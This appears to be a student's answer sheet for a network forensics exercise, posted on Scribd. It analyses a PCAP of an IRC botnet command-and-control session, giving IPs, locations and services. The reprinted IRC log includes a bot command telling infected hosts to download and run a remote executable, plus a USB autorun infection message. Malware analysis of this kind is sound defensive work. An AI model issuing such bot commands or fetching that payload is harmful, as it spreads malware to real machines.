Scribd
Upload
789 views3 pages

Answers

The document analyzes network traffic from a PCAP file and identifies: 1. Three IP addresses are involved in the communication - one in France and two private IPs. 2. The private IPs are running DNS and message tracking services while the public IP runs a C&C server on port 5540. 3. The PCAP shows IRC communication between a client and C&C server where a virus was injected onto a system and the author attempted to distribute another executable file. This indicates an attack involving malware control over IRC.

Uploaded by

rajuraikar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
789 views3 pages

Answers

The document analyzes network traffic from a PCAP file and identifies: 1. Three IP addresses are involved in the communication - one in France and two private IPs. 2. The private IPs are running DNS and message tracking services while the public IP runs a C&C server on port 5540. 3. The PCAP shows IRC communication between a client and C&C server where a virus was injected onto a system and the author attempted to distribute another executable file. This indicates an attack involving malware control over IRC.

Uploaded by

rajuraikar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Answers:-

---------------------------------------------------------------------------------------------------------------------------------------

Question 1. Write down the IP addresses of all the machines involved

Tool Used: Wireshark

Total IP's: 3

91.121.100.60

192.168.45.2

192.168.45.130

---------------------------------------------------------------------------------------------------------------------------------------

Question 2. What is the location of these IP addresses?

Site Used: www.hostip.info

IP: 91.121.100.60

Host name: ns353908.ovh.net.

IP address: 91.121.100.60

Location: Paris, FRANCE

Below IP's are private IP address

192.168.45.2

192.168.45.130

---------------------------------------------------------------------------------------------------------------------------------------

Question 3. What services run on these IP addresses?

On 91.121.100.60 a TCP port 5540 is running (as per SANS) the service is sdreport

On 192.168.45.2 a UDP port 53 is running which is DNS service and

On 192.168.45.130 a TCP port 1038 and UDP port 1037 is running and the service is Message Tracking
Query Protocol (MTQP) (as per SANS)

---------------------------------------------------------------------------------------------------------------------------------------

Question 4. Please explain the attack in detail and what you think is going on in this PCAP file:
From a quick glance on PCAP file we can find Command and Control communication between client
and server via IRC using port tcp/1038 and C&C server tcp/5540

IRC Server: irc.accesox.net

Nick Name: pLagUe{USA}64007

Message:

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .4.autorun.inf.. on drive.4. D:

A virus infection was injected on client.

Below is the IRC channel data


PASS mierdaq

NICK pLagUe{USA}64007

USER SkuZ * ok .4.TeaM UniX b0at 0.4

:sex.accesox.net NOTICE AUTH :*** Looking up your hostname...

:sex.accesox.net NOTICE AUTH :*** Checking ident...

:sex.accesox.net NOTICE AUTH :*** No ident response; username prefixed with ~

:sex.accesox.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

PING :56EF9DAC

PONG 56EF9DAC

:sex.accesox.net 001 pLagUe{USA}64007 :Welcome to the AccesoX IRC Network pLagUe{USA}[email protected]

:sex.accesox.net 002 pLagUe{USA}64007 :Your host is sex.accesox.net, running version Unreal3.2.9-rc1

:sex.accesox.net 003 pLagUe{USA}64007 :This server was created ven mar 25 2011 at 02:34:51 CET

:sex.accesox.net 004 pLagUe{USA}64007 sex.accesox.net Unreal3.2.9-rc1 iowghraAsORTVSxNCWqBzvdHtGp


lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ

:sex.accesox.net 005 pLagUe{USA}64007 CMDS=KNOCK,MAP,DCCALLOW,USERIP UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=16


CHANLIMIT=#:16 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 :are supported by this
server

:sex.accesox.net 005 pLagUe{USA}64007 MAXTARGETS=20 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=#
PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=AccesoX CASEMAPPING=ascii EXTBAN=~,qjncrR
ELIST=MNUCT :are supported by this server

:sex.accesox.net 005 pLagUe{USA}64007 STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

PRIVMSG ##verga## :.4.NueVo PuTo InfeCcIoN.


:sex.accesox.net 251 pLagUe{USA}64007 :There are 56 users and 189 invisible on 9 servers

:sex.accesox.net 252 pLagUe{USA}64007 8 :operator(s) online

:sex.accesox.net 253 pLagUe{USA}64007 1 :unknown connection(s)

:sex.accesox.net 254 pLagUe{USA}64007 30 :channels formed

:sex.accesox.net 255 pLagUe{USA}64007 :I have 28 clients and 0 servers

:sex.accesox.net 265 pLagUe{USA}64007 :Current Local Users: 28 Max: 196

:sex.accesox.net 266 pLagUe{USA}64007 :Current Global Users: 245 Max: 2976

:sex.accesox.net 372 pLagUe{USA}64007 :- This is the short MOTD. To view the complete MOTD type /motd

:sex.accesox.net 372 pLagUe{USA}64007 :-

:sex.accesox.net 376 pLagUe{USA}64007 :End of /MOTD command.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :+ix

:[email protected] NOTICE pLagUe{USA}64007 :[.Random News. - Oct 14 2010] Registren sus nick de nuevo ... gracias.

:[email protected] NOTICE pLagUe{USA}64007 :Your nick isn't registered.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :-ix

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

:pLagUe{USA}[email protected] JOIN :##verga##

:sex.accesox.net 332 pLagUe{USA}64007 ##verga## :!downloaditz http://www.freewebtown.com/redzone/plaga.exe c:\jiji.exe 1

:sex.accesox.net 333 pLagUe{USA}64007 ##verga## ragebot 1298999449

:sex.accesox.net 353 pLagUe{USA}64007 @ ##verga## :pLagUe{USA}64007

:sex.accesox.net 366 pLagUe{USA}64007 ##verga## :End of /NAMES list.

:sex.accesox.net 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

MODE ##verga## -ix

:sex.accesox.net 482 pLagUe{USA}64007 ##verga## :You're not channel operator

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .4.autorun.inf.. on drive.4. D:

:sex.accesox.net 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

PING :sex.accesox.net

PONG sex.accesox.net

---------------------------------------------------------------------------------------------------------------------------------------

You might also like